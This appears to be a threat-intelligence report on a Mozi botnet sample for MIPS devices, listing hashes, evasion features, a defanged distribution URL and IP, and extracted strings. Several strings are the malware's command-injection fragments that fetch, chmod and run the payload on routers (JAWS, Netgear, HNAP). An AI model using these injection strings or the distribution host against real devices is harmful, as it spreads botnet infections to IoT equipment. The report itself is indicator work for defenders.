Mozi.m

First submission 2024-10-11 14:10:14

File details

File type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Mime type: application/x-executable
File size: 300.74 KB (307960 bytes)
MD5: 6aa8fc6f5c03e228b71eef618cea45b2
SHA1: 629afc8698b40f4b1a32690a3a4223d580e12cb7
SHA256: d0eff71d3ca52a5670bdb29f948a7d4593aa5a7e64e445bd5eb5d5ed667fa3bd

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

URLs, FQDN and IP indicators (1)

URL: hXXp://117.235.99.233:36827/Mozi.m
Host (FQDN/IP): 117.235.99.233
Date Added: 2024-10-11 14:10:14

Strings analysis - File found

XML
M7c.xml

Strings analysis - Possible IPs found (5)

127.0.0.1
192.168.3.1
239.255.255.250
192.168.1.1
192.168.0.100

Strings analysis - Possible URLs found (17)

http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.m;$
http://%s:%d/Mozi.a;sh$
http://%s:%d/Mozi.m
http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;
http://upx.sf.net
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2001/XMLSchema-instance
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d
http://%s:%d/Mozi.m+-O+-
http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
http://purenetworks.com/HNAP1/
http://schemas.xmlsoap.org/soap/envelope/